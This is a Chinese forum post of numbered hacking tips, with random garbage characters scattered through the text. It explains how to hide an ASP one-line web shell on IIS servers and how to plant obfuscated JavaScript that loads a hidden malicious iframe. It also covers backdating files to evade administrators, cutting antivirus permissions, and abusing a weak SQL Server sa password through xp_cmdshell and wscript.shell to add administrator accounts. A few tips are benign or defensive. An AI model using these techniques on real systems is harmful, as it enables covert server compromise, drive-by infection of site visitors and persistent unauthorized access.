7 I* v: X- P' _$ J- q53、隐藏ASP后门的两种方法+ m) y9 ?4 a1 }, c- ]1 U
1、建立非标准目录:mkdir images..\' t* D! L. A: L: {7 k9 W0 V7 V' G& `
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
8 B9 Y: `* @, i( K通过web访问ASP木马:http://ip/images../news.asp?action=login
. W* W4 D5 ~- @! F$ }7 O如何删除非标准目录:rmdir images..\ /s
1 D# r% t X' e% Z2 a: ?' R2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:, c( Y" F1 Q- P+ J1 V
mkdir programme.asp# w6 k% F- A- z; a" B
新建1.txt文件内容:<!--#include file=”12.jpg”-->7 e. R3 ~2 U. [% b
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件2 W/ \. _2 e9 r1 L$ [6 ~
attrib +H +S programme.asp
8 F4 P2 X) t. S$ R, g6 G通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
% x0 e$ ~* j3 S/ b8 A! J$ J5 @# g
+ g: p) J: e- _54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. S- r! a' p9 \然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。8 @- u3 R5 }( {8 ?, {1 y6 `
2 `( F& B2 W8 D; @ v
55、JS隐蔽挂马# U6 S6 u% n3 ]1 U1 W% }6 `" Z3 g
1.$ Q8 O9 q% Z) _* d Z- ? W
var tr4c3="<iframe src=ht";
T. B: a# `1 X. j4 ntr4c3 = tr4c3+"tp:/";2 e" J+ z& Y+ C; \/ f2 E( G
tr4c3 = tr4c3+"/ww";
" ?# c; y+ W' D4 X. L& ktr4c3 = tr4c3+"w.tr4";8 X2 ^* o; ^& Y+ T& i3 |: F
tr4c3 = tr4c3+"c3.com/inc/m";
, W9 e5 E7 C5 G& w, ~; Dtr4c3 = tr4c3+"m.htm style="display:none"></i";
- B1 N; J7 M$ h" ^+ f+ r7 o" }6 ytr4c3 =tr4c3+"frame>'";5 n- d) L3 u1 u3 I0 @9 H8 U) o
document.write(tr4c3);
* b0 W8 T2 c0 A _* h# U" k0 `) }避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。* b. Y; K" L9 |/ u% Z' E& o4 f
, \0 ~0 J) j5 M5 Q: P( _2 [9 `
2.
2 X6 ? C3 Z" A# l0 D* H: t/ I转换进制,然后用EVAL执行。如
O! ~, ]8 w, A5 l0 teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
2 ?* A% Y0 n. F$ V; B# r不过这个有点显眼。5 d9 E! e* s4 Z8 _
3.
+ m/ N4 l, M( V+ P1 ]- Qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' u2 {; z, J V+ P# o# q) J$ ~最后一点,别忘了把文件的时间也修改下。
% |/ G! A& C! [3 Y, k9 D2 R+ j, i! f; K: H( ]! f* l
56.3389终端入侵常用DOS命令5 k. s" |# V+ E/ o4 C: o8 O
taskkill taskkill /PID 1248 /t ~: g: g. b: U
6 _0 c4 V- h- I' Q+ W, N% E Ctasklist 查进程
# U9 W0 D, n' o; f9 h" d% H" c
2 E3 \5 M* y9 p, W1 I' O$ v7 Fcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
# T% Q% q% U% e6 z7 n8 V8 w biisreset /reboot
6 F0 @9 h8 G7 k6 z5 g/ K, G. h! Mtsshutdn /reboot /delay:1 重起服务器
- [4 e2 c. H! p& h, X# G+ C' h$ m- O
* F$ W# |# u+ o# i% Vlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,3 E$ p! N' Q- h |9 h9 l
( K: H% @3 h" c Pquery user 查看当前终端用户在线情况2 @/ W0 B8 J8 Z: b+ z/ k/ K
( z8 g% ?+ c3 m- Y; f要显示有关所有会话使用的进程的信息,请键入:query process *
0 K% _) p0 T, L& z3 E& }+ w5 o% Z% s' e% Z, V+ J2 s$ H2 f
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:23 o* `- e5 j: d
+ A" ?! z8 N6 v, ~
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER22 N' M, D+ {2 ^ X3 [* C
! K/ `3 O6 ]0 \# a+ e4 k9 `
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02* i4 Z' K( T6 s8 g# V
9 |9 w% } y& v6 s$ @* m& f命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
1 m- L+ K$ L8 l: \( Y g: b. j/ o2 M: [ k
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
* C7 f. H) l% l2 Q4 Y0 O. {% {
/ R: O* ?) [: w* [命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。7 ?6 g2 i' m$ k/ M
, b- |" W8 O/ @! S( v* f: J命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机2 W6 M6 L9 B+ o+ i
8 ]" N( Y U* S1 L56、在地址栏或按Ctrl+O,输入:' y8 s" i! \$ E: r
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
% Q" k9 e/ f5 ]
" K, d _1 c. M# L& b" m7 p源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" b9 A* n0 e7 a
N" \( J* q6 R- `57、net user的时候,是不能显示加$的用户,但是如果不处理的话,: ~5 J+ d+ w* x" c1 q: o
用net localgroup administrators是可以看到管理组下,加了$的用户的。
$ M3 h: Y4 V8 M$ g; _6 }" Q$ h5 M9 W1 Y6 o
58、 sa弱口令相关命令
, K4 E! x4 E" u; a) r: G7 S6 _5 g+ H5 d, h+ M+ f
一.更改sa口令方法:7 q5 |8 n7 S, p0 Z' K2 X
用sql综合利用工具连接后,执行命令:1 U4 A% q/ \2 k! N- A
exec sp_password NULL,'20001001','sa'6 B% m% U( T+ ]
(提示:慎用!)! v9 o9 [, @ l) c3 l, n3 H: P
0 U! i# ^, @; |二.简单修补sa弱口令.
7 q; P5 d B2 x, W( w" j3 l2 @; x! A
方法1:查询分离器连接后执行:+ j% c5 X8 ?2 x2 {% Z# W8 ^
if exists (select * from
7 o7 D! t: M7 J @6 Hdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and7 v% P6 l5 s" m9 U3 N
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)" q3 ^7 n1 f( I* \$ {2 R/ k
( g# d Q, ^7 v- l: [exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( G9 [) M# V+ p" E: c( u
, K9 i& S& [* Y1 C3 E* y& e; m# P }6 }GO
. k- }7 _4 d! K# C6 _" I8 K$ ~: L |0 E' B
然后按F5键命令执行完毕
$ h# J5 a; D3 N& x' @2 E, f2 o! r+ R
方法2:查询分离器连接后
5 z6 q! E( ` V3 ~- O) `! ~& b$ u第一步执行:use master
/ c1 [, Y6 W3 |+ o8 i0 w第二步执行:sp_dropextendedproc 'xp_cmdshell'
& n2 J- h( a+ d# {' h& G然后按F5键命令执行完毕0 Q0 U) P9 B4 j# g( ^+ f9 X
5 k6 x* G* J( h7 c9 v# a
9 }* I8 V: c0 n% I& d
三.常见情况恢复执行xp_cmdshell.
! ~$ y6 \8 q7 b7 {: R$ }2 e, x0 d0 v0 v
/ }" O6 _ j$ w+ z
1 未能找到存储过程'master..xpcmdshell'.
" `- ~- @6 |; I3 d+ i* v 恢复方法:查询分离器连接后,
4 s2 E$ G* J1 g i* B" m* r第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int9 `: p% `" b( T# K, v/ r
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 R9 O, H: h: _, e+ l7 ~; B7 t6 K) f
然后按F5键命令执行完毕- i* ?5 h3 V# W9 {2 R* ?
8 X4 A. O+ Q) u6 L- |5 s# e: V2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
7 u$ v# Y( p1 i! m5 a恢复方法:查询分离器连接后,7 J4 k+ M$ T* Z( @) r- z
第一步执行:sp_dropextendedproc "xp_cmdshell"
. C5 g: ?$ X: r7 N第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* E: L7 ^2 Q$ j8 W
然后按F5键命令执行完毕
8 S. c4 ^* D* c
$ N. U. s5 l& z! }* S) h3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. S0 q* ~8 x9 l& p* `" t恢复方法:查询分离器连接后,! F! @% L- u- K- Y
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'8 U. K, n4 j) `: _
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
. K+ M4 m& E; [( B3 B然后按F5键命令执行完毕& x' f' s6 }3 l4 A2 z
9 S4 N" z9 {: M7 ~四.终极方法.
% T3 I7 I6 l: v" ~! ?$ I- e4 d: P, \如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:3 d1 a0 p u1 U0 M9 L; a1 u& r
查询分离器连接后,
, K( k e% C% q' F) ~ t, ^2000servser系统:
7 S! w* m) x7 T- Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: q- Q: Z- T; U3 a
0 O, [3 [* b9 fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( s+ t- ?4 G& c! h- {. ]8 m* U" x9 V2 P, y; ?; ^
xp或2003server系统:( R. |3 N, d- c9 ~
! v- }" A3 S2 f f+ F* Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
6 W$ i& V% g3 u5 _, H( j1 v2 f
( J5 j/ o: F1 C2 e3 F& n3 J6 wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 L9 e1 @% G# c9 U
|
发表于 2012-9-15 14:51:03
收藏
支持
反对